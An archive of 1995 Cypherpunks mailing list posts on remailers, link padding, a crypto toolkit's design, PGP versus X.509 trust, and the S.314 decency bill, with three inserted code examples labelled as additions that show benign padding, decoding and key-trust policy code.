From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 8 Feb 95 17:42:41 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: Judges-L FAQ
In-Reply-To: <v03001409ab5ef19cb7c7@[140.174.229.204]>
Message-ID: <Pine.3.89.9502081717.A17747-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



At 12:43 2/8/95, Craig A. Johnston wrote:
> >I must inform you that this FAQ is copyrighted material, and
> >you are requested not to distribute it.
 
On Wed, 8 Feb 1995, Michael Sattler wrote:
> What good is a FAQ if you can't distribute it.  The judges are confused in
> more ways than one.

I am entirely sympathetic to the judges, but obviously we need
to keep an eye on them.

Their attempt to restrict circulation of their FAQ fails to
inspire confidence.  It is suspiciously reminiscent of 
what the Church of Scientology is up to.

But I repeat, I think that the judges list is necessary
and desirable, so long as they remember they are self
appointed and do not start to imagine that they are
the "official" judges.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 15:04:29 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082251.AA03118@toad.com>
Message-ID: <9502082303.AA10796@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



xpat@vm1.spcs.umn.edu says:
> IMHO, an ideal message would have the ability to handle nested objects
> of varying types, MIME is only a start.

What is it precisely that you might want to encapsulate that MIME
can't encapsulate?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Wed, 8 Feb 95 18:19:01 PST
To: cypherpunks@toad.com
Subject: Meeting Anncouncement for Sat. Feb. 11 1995 SF Bay Area Meeting
Message-ID: <9502090217.AA09964@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain



What:	Cypherpunks SF Bay Area Physical Meeting
When:	13:00 February 11 1995
Where:	Silicon Graphics, Inc.,  Building 5 (SGI's Iris Cafeteria)
	2025 North Shoreline Boulevard, Mountain View, CA, Earth, Sol, MW

Topic:	Crypto Networking Protocol Hygiene

Agenda:  (listed times are almost all a joke)
  12:00	Brown Bag Lunches, AV Debugging, Loose Talk
  13:00	Meeting Begins (MBONE broadcast begins)
  13:02	Meeting Announcements, Agenda Rewrite
  13:08	Hugh Daniel on
  	"When What Goes Where: Good Networking Protocol Hygiene"
  13:45	Eric Hughes on
	"Sendmail as a Multiplexor"
  14:30 Michael Sattler on
	"Announcement of CryptDisk v1.0"
  14:40	General Announcements, Questions, Confusion etc.
  15:00	BREAK!
  15:30	Doug Barnes
        "Stream-oriented, analysis-resistant public-key protocols over UDP"
  16:15 Raph Levien & KT Kislitzin on
	"Design philosophy for the upcoming PGP 3.0 API"
  17:00	Hot New Topics of the Week & General Free For All!
  17:59 Mbone Broadcast ends
  18:00	KP room, Thank our SGI hosts & GOTO Dinner

Presentations:

"When What Goes Where: Good Networking Protocol Hygiene"
	Hugh Daniel <hugh@toad.com>
  When designing, coding and testing programs we are confronted with a
myriad of choices as to how various parts of the solution communicate.
Much is known about how to design 'protocols' that are flexible,
debuggable & robust.
  We are currently encoding cryptographic protocols in our systems and
networks at a furious rate, yet there are new challenges in keeping such
systems robust, secure and sometimes even anonymous.
  I hope to touch on some of the well known tricks and dangers, what
is new when cryptographic and anonymous systems are combined with
today's systems and where we might learn from the past.
  

"Sendmail as a Multiplexor."
           Eric Hughes <eric@remailer.net>
  The basic architecture of sendmail is a recognizer and a dispatcher.
These two elements provide a good framework for designing systems that
can be changed piece by piece.  Even when a facility seems to have
stabilized, it's often a good idea to keep the flexible framework
around for future experimentation and expansion.


"Announcement of CryptDisk v1.0"
	Michael Sattler <msattler@jungle.com>
  CryptDisk (for the Macintosh) is an example of the kinds of [mostly]
transparent strong crypto that we need.  Integrated smoothly with the
operating system, CryptDisk provides IDEA encryption on a block
read/write level for a virtual hard disk.  Its beauty lies mainly in
that it does exactly what the user expects and requires no more setup
than remembering a pass-phrase.  Source code is available upon
request.  Warning:  Some governments might consider this software a
"Munition", not suitable for "private possession" by free peoples.


"Stream-oriented, analysis-resistant public-key protocols over UDP"
	Doug Barnes <dab@Tadpole.COM>
  Many cypherpunks projects have a need to reliably transmit
variable-length (sometimes quite long) data over unreliable
networks. TCP lends itself to traffic analysis and is not well-suited
for use in a hypothetical system of packet laundries that would lead
to packets within a particular stream appearing to come from a variety
of sources.  We have designed and are currently implementing a
UDP-based, hidden-streams protocol that utilizes fixed-length blocks
and pseudo-random sequence numbering to provide reliable,
stream-oriented services to higher-level applications despite
extremely creative routing and laundering of packets.

Raph Levien <raph@netcom.com> & KT Kislitzin <ktk@sgi.com>
	"Design philosophy for the upcoming PGP 3.0 API"
  PGP is getting a major upgrade soon, some of the team doing the
work will talk about the motivations and directions the work is
going in.

--------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 8 Feb 95 15:35:55 PST
To: weidai@eskimo.com
Subject: Re: a new way to do anonymity
In-Reply-To: <199502082243.AA19005@mail.eskimo.com>
Message-ID: <9502082318.AA21943@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



...
>since you can use it to do nested encryption.  All that's needed is 
>to hack it so that it implements link encryption (i.e., send a
>constant stream of random data in between keypresses).
...
You could just send a stream of some uncommon ascii character, which you
filter out on the receiving end (if you wanted to do this right, you could add
a simple escape mechanism for actually passing that character).

To avoid flooding the network and also bringing the machines on which it's
running to its knees, you'd probably want to add a bandwidth-choke
mechanism to run the white noise at some reasonable rate.  You'd have to limit
the real traffic output to the same rate.  Link encryption over a broadcast
network is a tricky business.
>
>I wonder if Matt has the time and interest to do this...  If not then I 
>guess I can try, but I've never done real crypto programming before...
>

For the next couple of months, I have absolutely no free hacking time.
Things on the stack include:
	- ESM 1.0
	- Diffie-Hellman encrypting and authenticating Telnet (almost ready...)
	- CFS 1.3
	- The course
	- The book
	- My real work

So I don't even have the time to figure out whether I have the interest.

-matt
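
The filler-character padding, escape mechanism and rate choke suggested in the message above, as an added example that is not part of the original post and is not ESM code. The FILLER and ESC byte values, the substitution codes and all class and function names are assumptions of this sketch; it shows only the framing, and encrypting the resulting stream is outside it.

```python
from collections import deque

FILLER = 0x16            # assumed "uncommon" character sent when idle
ESC = 0x1B               # assumed escape character
# A real FILLER or ESC byte in the data is sent as ESC + a substitute code,
# so a bare FILLER on the wire is always padding.
SUBST = {FILLER: ord("F"), ESC: ord("E")}
UNSUBST = {code: byte for byte, code in SUBST.items()}


def escape(data):
    """Rewrite data so it never contains a bare FILLER or ESC."""
    out = bytearray()
    for b in data:
        if b in SUBST:
            out += bytes([ESC, SUBST[b]])
        else:
            out.append(b)
    return bytes(out)


class PaddedLink:
    """Sender side: exactly one byte leaves per tick, real or filler.
    Real traffic is choked to the same rate, so a burst simply queues."""

    def __init__(self):
        self.queue = deque()

    def send(self, data):
        self.queue.extend(escape(data))

    def tick(self):
        return self.queue.popleft() if self.queue else FILLER


def run_link(events, n_ticks):
    """events maps tick number -> bytes typed at that tick (constructed
    input).  Returns (wire bytes, number of bytes still queued)."""
    link = PaddedLink()
    wire = bytearray()
    for t in range(n_ticks):
        if t in events:
            link.send(events[t])
        wire.append(link.tick())
    return bytes(wire), len(link.queue)


def receive(wire):
    """Receiver side: drop filler, then undo the escaping."""
    out = bytearray()
    escaped = False
    for b in wire:
        if b == FILLER:
            continue                  # padding may fall anywhere, even after ESC
        if escaped:
            if b not in UNSUBST:
                raise ValueError("bad escape code %#x" % b)
            out.append(UNSUBST[b])
            escaped = False
        elif b == ESC:
            escaped = True
        else:
            out.append(b)
    if escaped:
        raise ValueError("stream ends inside an escape sequence")
    return bytes(out)


if __name__ == "__main__":
    typed = {3: b"ls\n", 10: bytes([FILLER, ESC]) + b"x"}   # constructed keypresses
    wire, backlog = run_link(typed, 40)
    idle, _ = run_link({}, 40)
    print(len(wire) == len(idle), receive(wire), backlog)
```
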




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A Loose Affiliation of Millionaires and Billionaires and Babies <cactus@hks.net>
Date: Wed, 8 Feb 95 16:14:33 PST
To: cypherpunks@toad.com
Subject: Hastur CT status
Message-ID: <199502082009.TAA22774@seabsd.hks.net>
MIME-Version: 1.0
Content-Type: text/plain



(Sorry if the signature gets anybody's noses out of joint.  I'm in a goofy
 mood.)

-----ORTVA CTC FVTARQ ZRFFNTR-----

It's another Hastur Crypto Toolkit progress report.  Why?  Because many
people expressed an interest in it, because I want to continue to get
comments on what I'm doing, because I want people who might be inclined
to do something similar to know about what I'm doing, and because
cypherpunk projects tend to be assumed to be dead if nothing is heard.

The general IO section skeleton is finished, and all file I/O and memory
I/O types are supported.  Encoding rules now fully coded in are rot13 (for
simple testing), uuencode, and radix64.  There are also unfilled stubs
for DER/BER at the moment.  

I'm about to start in on the framework for crypto code and key management:
Any ideas on handling a generalized concept of keys will be greatly
appreciated!  For instance, I've asserted several times here that
X.509 keys can be fully modelled as special cases of PGP web-of-trust
keys with one additional field, the expiration time.  Nobody has flamed me, but
nobody has agreed with me... since I've only read the X.509 spec and never
actually used them, I'd like some assurance that I'm not missing some
subtleties in this approach.

The general I/O is fairly slow, since items are fetched in blocks
appropriate for the encoding (IE, radix 64 maps 4 bytes r64 to 3 bytes
binary);  I might put the effort into optimizing it later, but my gut
feeling is that the crypto is going to be at least an order of magnitude
slower.

Now, the general outline of what I'm building.  This is pretty much the
same as what I've posted before.  I do want to note that all I/O is
locking, using a library of locking versions of I/O fns I sent to some
folks here a while ago.

- ---
Hastur Crypto Toolkit.

In essence, what I'm building is a crypto library that takes a very general
approach with a few parameters controlling its behavior.  The idea is
to have something that anybody can drop into their mail agent and have
an easy way of using crypto and interface with existing systems such as
PGP.  A major design goal is to be backwards compatible with PGP, but
paramount is having a plug-and-play library that will be flexible enough
to meet future crypto needs.  RIPEM compatibility is also desirable.

One of the biggest problems today is that crypto libraries are chiselled out
to deal with very specific cases -- the most general I know of is RSAREF,
which deals only with crypto functions that RSADSI happens to find
useful.

The things that I've parametrized in the design are:

	- Type of I/O.  Right now, files (and fds) and a couple of memory
	 configurations are supported.  I've made it trivial to add new
	 types of I/O as well, and there are flags to support
	 immediate zeroing of data once it is read into the internal
	 structures.

	- Encoding of data.  There are multiple ways to encode a bytestream
	 and these methods can be nested.  In this library, you can specify
	 the type.  I also want to eventually put logic in (where possible)
	 to determine the type and will also use this to support various
	 compression schemes.  Currently supported are rot13, radix64, and
	 uuencode.

	- Ciphers (this is the big one).  Right now, as I've mentioned,
	 things are very haphazard.  What I want is a way to change one
	 parameter from, for example, CRTYPE_IDEA to CRTYPE_DES and
	 thus change the encryption scheme.

	- Key management.  I know of two major ways of doing things
	 right now, X.509/PEM certificates as pushed by RSADSI, and
	 PGP web-of-trust.  As far as I can tell, PEM-style certificates
	 are just a degenerate case of PGP web-of-trust.

	- Random sources.  People should be offered a pretty good source
	 of random numbers, but should also be allowed to drop in their
	 own sources.  This is going to be relatively tough on platforms
	 I don't know much about, IE Mac and PC, but I'm hoping for some
	 help on this.  I can also salvage some code from RIPEM for those.

	- Autoconfiguration to incoming messages.  People should be
	 able to open a file and have it work, even with schema added
	 to the library after the original adaption to Hastur (assuming
	 an upgrade of the library, of course).

There's some other stuff that I'm probably forgetting here, but that's
the gist of it.  The cipher code is going to be pretty simple: I'm
getting a lot of code from various places on the net;  the code exists,
it just isn't put into a form that is easy to use.  The most difficult is
going to be a generalized scheme for key management: first off, I'm probably
going to simply use PGP's web-of-trust as my model, assuming the X.509/PEM
style certificates can be treated as degenerate cases of web of trust.

I also intend to offer a GSSAPI interface to all of this in release
1.1 or so.

This is so far all in C: I'm not a C++ convert yet and C is still the
most portable of the languages about.  Later, perhaps class libraries
can be designed around the same code.

Comments are actively solicited.

-----ORTVA CTC FVTANGHER-----
Irefvba: 2.6.2

vDPINjHOYmxxvuAutbieCO7qNDSfStDNyU0k5/4/10EHEJGY72kwhzoGEAZMe0z7
oQf4Y+QbtweC9vauOYo8SAXFrI4td2coJ3xbtsojYTuhHamWcX2AxIlLedSWFuuJ
e6mIEDbk6xIpoyLvIsfSLUqKkO6qe4hWXZxORSF6vN6cqvmNaNAuG17nE8IqfiAh
ZeydKo0cNf8=
=oOZD
-----RAQ CTC FVTANGHER-----
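
The nested, block-wise decoding described in the message above (rot13 wrapped around radix64, 4 characters in for 3 bytes out, staging buffers zeroed after use), as an added example in C. This is not Hastur's code: the names `enc_type`, `ENC_ROT13`, `ENC_RADIX64` and `decode_nested` are hypothetical, and the sample input is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical encoding selectors; not Hastur's real identifiers. */
typedef enum { ENC_ROT13, ENC_RADIX64 } enc_type;

#define SCRATCH 256   /* size of each internal staging buffer */

/* Zero through a volatile pointer so the compiler cannot drop the stores. */
static void wipe(void *p, size_t n) {
    volatile unsigned char *v = p;
    while (n--) *v++ = 0;
}

static int r64_value(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

static long rot13_decode(const unsigned char *in, size_t n,
                         unsigned char *out, size_t cap) {
    if (n > cap) return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = in[i];
        if (c >= 'a' && c <= 'z') c = (unsigned char)('a' + (c - 'a' + 13) % 26);
        else if (c >= 'A' && c <= 'Z') c = (unsigned char)('A' + (c - 'A' + 13) % 26);
        out[i] = c;
    }
    return (long)n;
}

/* One unbroken radix64 line: every 4 input characters yield up to 3 bytes.
 * '=' is accepted only at the tail of the final block, and leftover bits
 * in a padded block must be zero so each value has exactly one encoding. */
static long radix64_decode(const unsigned char *in, size_t n,
                           unsigned char *out, size_t cap) {
    size_t o = 0;
    if (n % 4 != 0) return -1;
    for (size_t i = 0; i < n; i += 4) {
        int v[4], pad = 0;
        for (int k = 0; k < 4; k++) {
            unsigned char c = in[i + k];
            if (c == '=' && i + 4 == n && k >= 2) { v[k] = 0; pad++; continue; }
            if (pad) return -1;                 /* data after padding */
            if ((v[k] = r64_value(c)) < 0) return -1;
        }
        if ((pad == 1 && (v[2] & 0x03)) || (pad == 2 && (v[1] & 0x0f))) return -1;
        unsigned long w = ((unsigned long)v[0] << 18) | ((unsigned long)v[1] << 12)
                        | ((unsigned long)v[2] << 6)  |  (unsigned long)v[3];
        size_t produce = (size_t)(3 - pad);
        if (o + produce > cap) return -1;
        out[o++] = (unsigned char)((w >> 16) & 0xff);
        if (produce > 1) out[o++] = (unsigned char)((w >> 8) & 0xff);
        if (produce > 2) out[o++] = (unsigned char)(w & 0xff);
    }
    return (long)o;
}

/* Peel the layers off outermost first. Returns the decoded length, or -1 on
 * malformed input or insufficient space. Both staging buffers are wiped
 * before returning, on success and on failure. */
long decode_nested(const enc_type *layers, size_t nlayers, const char *text,
                   unsigned char *out, size_t cap) {
    unsigned char a[SCRATCH], b[SCRATCH];
    unsigned char *src = a, *dst = b, *tmp;
    size_t len = strlen(text);
    long n = (len <= SCRATCH) ? (long)len : -1;

    if (n >= 0) memcpy(a, text, len);
    for (size_t i = 0; i < nlayers && n >= 0; i++) {
        n = (layers[i] == ENC_ROT13)
            ? rot13_decode(src, (size_t)n, dst, SCRATCH)
            : radix64_decode(src, (size_t)n, dst, SCRATCH);
        tmp = src; src = dst; dst = tmp;        /* output becomes next input */
    }
    if (n >= 0 && (size_t)n <= cap) memcpy(out, src, (size_t)n);
    else n = -1;
    wipe(a, sizeof a);
    wipe(b, sizeof b);
    return n;
}

int main(void) {
    /* Constructed sample: "Hastur" -> radix64 "SGFzdHVy" -> rot13 "FTSmqUIl". */
    const enc_type chain[] = { ENC_ROT13, ENC_RADIX64 };
    unsigned char out[64];
    long n = decode_nested(chain, 2, "FTSmqUIl", out, sizeof out);
    if (n < 0) return 1;
    printf("%.*s\n", (int)n, (const char *)out);
    return 0;
}
```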




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Wed, 8 Feb 95 17:28:24 PST
To: cypherpunks@toad.com
Subject: Not necessarily crypto but scary anyway...
Message-ID: <199502090123.TAA01134@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

A friend advises me that today House Bill 666 passed. This supposedly would
allow police officers to use evidence collected illegally if they 'believed'
that it was collected in good faith.

Any word on it?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 8 Feb 95 19:25:52 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Judges-L FAQ
Message-ID: <v0300141bab5f39c0aa65@[140.174.229.204]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:40 2/8/95, James A. Donald wrote:

>But I repeat, I think that the judges list is necessary
>and desirable, so long as they remember they are self
>appointed and do not start to imagine that they are
>the "official" judges.

By choosing that name they've shown (to my satisfaction) that they have the
subtlety and self-importance of a lynch mob.  The goofiness about a
copyrighted FAQ only adds to my feelings of them being a dangerous keystone
kops net-alike.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@beat.ugcs.caltech.edu ((me))
Date: Wed, 8 Feb 95 19:38:08 PST
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: S314 and potential hell-raising
Message-ID: <3hb6vd$2q4@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


It seems that 314 is a VERY BIG potential problem, and we should
probably be doing everything in our power to find out what it REALLY
means and fight it tooth and nail.  I think Usenet is the perfect
place to take this fight, but I'm not sure what groups are best 
suited to a discussion.  Any suggestions?

We simply MUST isolate this bill and, if it even comes close to sounding
like what I think it does (ending the near-absolute freedom of expression
and content across the Internet), we must fight it in every way possible,
enlisting the ACLU, the EFF, and any other group potentially willing
to pour money into a legal battle.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 19:51:32 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <v01510100ab5f0c4d5b89@[166.84.250.21]>
Message-ID: <199502090349.TAA24428@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: dmandl@panix.com (David Mandl)

   For a while, we were all convinced that the FCC left all these rules
   impossibly vague on purpose, just so that you didn't even know how to obey
   the law if you wanted to.  Everyone a potential criminal.

Just like the banking world, where it's no secret at all.

Did y'all know there's a separate market segment in the banking
business called "Compliance"?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 19:58:00 PST
To: cypherpunks@toad.com
Subject: Da Judge-L FAQ -- We are not Amused
Message-ID: <199502090356.TAA04852@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



It has come to Our attention that Our FAQ, the Da Judge-L FAQ, is being
distributed amongst the rabble.

We are not amused.

The so-called Cypherpunks List, having been a party to this illegal
and "most heinous" distribution, is hereby invited to appear in our
Chambers on the morning of Tuesday, 29 February, 1995, at a place of
our choosing. Defense will be heard, and then the guilty will be
punished.

Royally Yours, 

Da Judge-L







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:10:38 PST
To: cypherpunks@toad.com
Subject: Re: Hastur CT status
In-Reply-To: <199502082009.TAA22774@seabsd.hks.net>
Message-ID: <199502090408.UAA24470@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: A Loose Affiliation of Millionaires and Billionaires and Babies <cactus@hks.net>

   For instance, I've asserted several times here that X.509 keys
   can be fully modelled as special cases of PGP web-of-trust keys
   with one additional field, the expiration time.  Nobody has flamed
   me, but nobody has agreed with me... since I've only read the X.509
   spec and never actually used them, I'd like some assurance that I'm
   not missing some subtleties in this approach.
   
The only real question about a particular string of bits claiming to
be a public key of a certain persona is whether the operator trusts
that the key does belong to that persona.  PGP and X.509 models both
provide their own kinds of assurances to individuals who might use a
key.  The relation between the user and the claim of ownership is the
important relationship.  Any sort of key certificate, of whatever
sort, is merely an aid to gaining trust.

Key certificates don't prove ownership.  Key certificates transfer the
need for trust in the key to the need for trust in the certificate.
Put another way, a key distribution system allows a user to trust
something harder to fake than a single key.  The transfer is the
critical point here; instead of trusting one small thing, you can
trust one larger thing.  We hope that the larger system is worthy of
our trust.

Neither PGP nor PEM is a general purpose key distribution system,
although PGP is more general than PEM.  Both have their various
arbitrary and capricious policies hardcoded into both spec and source.

I would recommend, Todd, that you not try to unify the various key
distribution systems.  It's premature.  Rather, provide a local policy
hook for the user (and this is _not_ just the sysadmin, as you know)
to specify how much trust pertains to each given keydist system, and
of what idiosyncratic sorts.

Eric
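
The local policy hook recommended in the message above, shown in C as an added example; it is not code from Hastur or from the post, and every type and function name in it is hypothetical. It assumes the signatures on each claim were already verified cryptographically before the hook is called.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

/* All names below are hypothetical illustrations. */
typedef enum { KD_PGP_WOT, KD_X509 } keydist;
typedef enum { TRUST_REJECT, TRUST_ASK_USER, TRUST_ACCEPT } verdict;

/* What a key distribution system asserts about one key. */
typedef struct {
    keydist system;
    const char *persona;
    const char *const *certifiers;  /* PGP: signers; X.509: issuer chain, root last */
    size_t ncertifiers;
    time_t not_after;               /* 0 means no expiry was stated */
} key_claim;

typedef verdict (*policy_hook)(const key_claim *c, time_t now, void *user_ctx);

/* Library side: no trust rules are hardcoded here. Without a hook from the
 * user there is no basis for trust, so the answer is REJECT. */
verdict evaluate_key(const key_claim *c, time_t now, policy_hook hook, void *ctx) {
    if (c == NULL || hook == NULL) return TRUST_REJECT;
    return hook(c, now, ctx);
}

/* User side: one person's idiosyncratic policy, kept outside the library. */
typedef struct {
    const char *const *introducers; size_t nintroducers;
    size_t pgp_needed;              /* distinct trusted signers required */
    const char *const *pinned_roots; size_t nroots;
} local_policy;

static int in_list(const char *s, const char *const *list, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (strcmp(s, list[i]) == 0) return 1;
    return 0;
}

verdict user_policy(const key_claim *c, time_t now, void *ctx) {
    const local_policy *p = ctx;
    if (c->not_after != 0 && now > c->not_after) return TRUST_REJECT;
    switch (c->system) {
    case KD_PGP_WOT: {
        /* Iterate over the user's introducers, not over the signatures, so a
         * signer that appears twice on the key still counts only once. */
        size_t hits = 0;
        for (size_t i = 0; i < p->nintroducers; i++)
            hits += (size_t)in_list(p->introducers[i], c->certifiers, c->ncertifiers);
        if (hits >= p->pgp_needed) return TRUST_ACCEPT;
        return hits > 0 ? TRUST_ASK_USER : TRUST_REJECT;
    }
    case KD_X509:
        /* Accept only chains that end at a root this user has pinned. */
        if (c->ncertifiers == 0) return TRUST_REJECT;
        return in_list(c->certifiers[c->ncertifiers - 1], p->pinned_roots, p->nroots)
               ? TRUST_ACCEPT : TRUST_REJECT;
    }
    return TRUST_REJECT;
}

int main(void) {
    /* Constructed sample data. */
    const char *const intro[] = { "alice", "bob" };
    const char *const roots[] = { "Example Root CA" };
    const char *const sigs[]  = { "alice", "alice", "mallory" };
    local_policy pol = { intro, 2, 2, roots, 1 };
    key_claim k = { KD_PGP_WOT, "todd", sigs, 3, 0 };
    printf("verdict=%d\n", (int)evaluate_key(&k, (time_t)800000000, user_policy, &pol));
    return 0;
}
```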




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don Clysdale <clysdale@dragon.achilles.net>
Date: Wed, 8 Feb 95 18:48:27 PST
To: jason cooper <jcooper@acs.ucalgary.ca>
Subject: Re: The Rise of "Worse is Better"...
In-Reply-To: <Pine.3.89.9502070839.B31143-0100000@acs6.acs.ucalgary.ca>
Message-ID: <Pine.SUN.3.91.950208201048.26954A-100000@dragon.achilles.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, jason cooper wrote:

> I like.  I guess I'm basically in with the New Jersey crowd.  Anybody 
> else?

	Definitely...  You've seen some of my code, haven't you...??

Remember that LISP shit at 4:00 in the morning, Stig?  Gack was
that New Jersey code!!!

								-Ian!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:14:43 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <199502090413.UAA24481@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>

   You are right here. However, our observation is that an interesting
   chunk of the world is moving towards using X.509 based certificate
   infrastructures for many things.

It's that interesting chunk that RSADSI is pointing out to you.  When
you see the world through the eyes of a vendor ...

And you know, of course, that PEM really stands for Patent Extension
Mechanism.

I don't really blame you much.  I mean TIPEM handles all the X.509
stuff just fine and PGP can't get out even the simplest of libraries,
or even a partial library.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:20:48 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <199502082037.MAA02640@jobe.shell.portal.com>
Message-ID: <199502090419.UAA24497@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Hal <hfinney@shell.portal.com>

   Is there precedent for
   adding service-by-mail functionality in this way?  

You mean, like MIME?

   (Maybe "Latency"
   might be used in a future extension of RFC822 for some other meaning than
   what we are using it for.)

The command should be Add-Delay: if you want to achieve the result of
some latency.  (Those who don't recognize the double-edged nature of
this remark are welcome to make fools of themselves in public.)

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:23:40 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <9502081309.ZM28575@warp.mcom.com>
Message-ID: <199502090422.UAA24509@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>

   Yes, there will be. We haven't formalized it yet, but we have been
   getting enough interest to warrant it. Understand that this is not
   the main thrust of our business (selling source code), so it will
   certainly take some time to put it all together.

Pardon me if I point out that when you write a new facility and want
people to be compatible with it, there needs to be source code
available for distribution.  Perhaps this is merely a lapse in
corporate self-awareness and fundamental lack of planning.  I could be
wrong.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:27:14 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082303.AA10796@snark.imsi.com>
Message-ID: <199502090425.UAA24521@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   xpat@vm1.spcs.umn.edu says:
   > IMHO, an ideal message would have the ability to handle nested objects
   > of varying types, MIME is only a start.

   What is it precisely that you might want to encapsulate that MIME
   can't encapsulate?

Perry, you're missing the whole point, just like the exchange a few
days ago about a remailer format standard.

MIME is primarily a packaging standard.  MIME does not define the
innards, the payload, the contents.  MIME is only a start at what the
complete data format should look like.  You say MIME, and you've not
completely specified the data format, but rather constrained it in a
way that most everybody basically agrees with, including me.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Wed, 8 Feb 95 20:38:25 PST
To: cypherpunks@toad.com
Subject: S. 314 and existing situation
Message-ID: <199502090439.UAA23399@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



Gee, fellas, looking over this bill, *most* of what's going on is
just porting existing telephone law over to cybercomm. Given the
existence of 900-sex-talk, the phone companies are clearly not being
held responsible for content.

They are required, of course, to cooperate when complaints of 
harassing or obscene calls are made, to obey properly warranted 
requests for wiretaps, etc.  It's perfectly reasonable to expect 
similar requirements on net service providers.

> 
> Read carefully. There are indeed implications for Internet service 
> providers in terms of their responsibility under the law for the content 
> of their systems and services.
> 

Yeah, but First Amendment and common carrier law is a morass of 
conflicting statutes, interpretations, and case law.  After all, 
libel law puts some content liability on newspapers [too much, IMHO, 
but it has hardly destroyed freedom of the press].

As several posters have noted, the placement of the key words 
"knowingly" and "intentionally" is critical.  It doesn't appear, 
though, that any "knowingly"s or "intentionally"s have been removed.  
I am forwarding copies of this and the whole bill text to my brother, 
the former DA in Telluride, to see if he sees any unusual craptraps.  
I'll post any useful reply ...

>    
>    (a) Prohibited acts generally
>    
>    Whoever -
>    
>    (1) in the District of Columbia or in interstate or foreign
>    communication by means of [telephone] telecommunications
>    device -
>    
>    (A) [makes any comment, request, suggestion or proposal] 
>    makes, transmits, or otherwise makes available any comment,
>    request, suggestions, proposal, image, or other communication]
